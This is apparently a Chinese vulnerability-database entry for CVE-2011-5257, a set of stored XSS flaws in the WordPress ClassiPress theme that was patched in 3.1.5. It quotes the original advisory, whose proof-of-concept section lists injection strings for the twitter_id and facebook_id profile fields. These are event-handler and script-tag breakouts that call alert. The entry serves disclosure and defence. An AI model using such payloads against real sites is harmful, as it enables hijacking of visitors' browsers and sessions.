WordPress Classipress主题多个跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1120587 漏洞类型 跨站脚本
发布时间 2011-10-31 更新时间 2013-02-14
CVE编号 CVE-2011-5257 CNNVD-ID CNNVD-201302-160
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/18053
https://www.securityfocus.com/bid/50433
https://cxsecurity.com/issue/WLB-2011110001
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201302-160
|漏洞详情
WordPress平台上的Classipress主题3.1.5之前版本中存在多个跨站脚本漏洞。通过(1)与Twitter桌面小工具有关的twitter_id参数以及(2)与Facebook桌面小工具有关的facebook_id参数,远程攻击者可利用该漏洞注入任意网页脚本或HTML代码。
|漏洞EXP
# Exploit Title: WordPress Classipress Theme <= 3.1.4 Stored XSS
# Date: 2011-09-26
# Author: Paul Loftness
# Contact:http://attackvectorlabs.blogspot.com
# Vendor: Appthemes LLc. 
# Product Web Page: http://www.appthemes.com/themes/classipress/
# Version: <=3.1.4
# Tested Versions: 3.1.4, 3.0.5.3

Summary:
-------------------------
ClassiPress is a popular and widely used classified ads software for WordPress. 

Description: 
-------------------------
Classipress is vulnerable to multiple stored XSS vulnerabilities.  Input through the POST parameters 'facebook_id' and 'twitter_id' in a registered user's profile page is either not sanitisized or poorly sanitised (version specific) allowing the attacker to insert Javascript code. 

In version 3.0.5.2 and presumably all previous versions, no sanitation is in place, allowing an attacker to insert code within a tag or to break out of it.  In version 3.1.4, the less-than character is sanitised but an attacker can still insert quotes and place an event handler in the tag.  


Proof-of-Concept Code:
-------------------------

Insertion page: http://example_site/author/profile/
Infected page : http://example_site/author/attacker_username/
Note: Some sites replace "author" with another path, this is not a vanilla configuration, however. 

Version: ClassiPress 3.0.5.2
Vulnerable Input Parameters:

	twitter_id:  " onmouseover="alert('XSS');
	facebook_id: " onmouseover="alert('XSS');
    Alternate Exploit code:
	twitter_id:  "><script>alert('XSS');</script><div id="
	facebook_id: "><script>alert('XSS');</script><div id="


Version: ClassiPress 3.1.4
Vulnerable Input Parameters:
	
	twitter_id:  " onmouseover='alert("XSS");'><
	facebook_id: " onmouseover='alert("XSS");'><


Timeline:
-------------------------
Vulnerability Discovered: 8/10/2011
Vulnerability Reported to Vendor: 9/1/2011
Patch Released with version 3.1.5: 10/7/2011
|受影响的产品
AppThemes Classipress 3.1.4 AppThemes Classipress 3.0.5 3
|参考资料

来源:OSVDB
名称:76712
链接:http://www.osvdb.org/76712
来源:EXPLOIT-DB
名称:18053
链接:http://www.exploit-db.com/exploits/18053
来源:SECUNIA
名称:46658
链接:http://secunia.com/advisories/46658
来源:docs.appthemes.com
链接:http://docs.appthemes.com/classipress/classipress-version-3-1-5/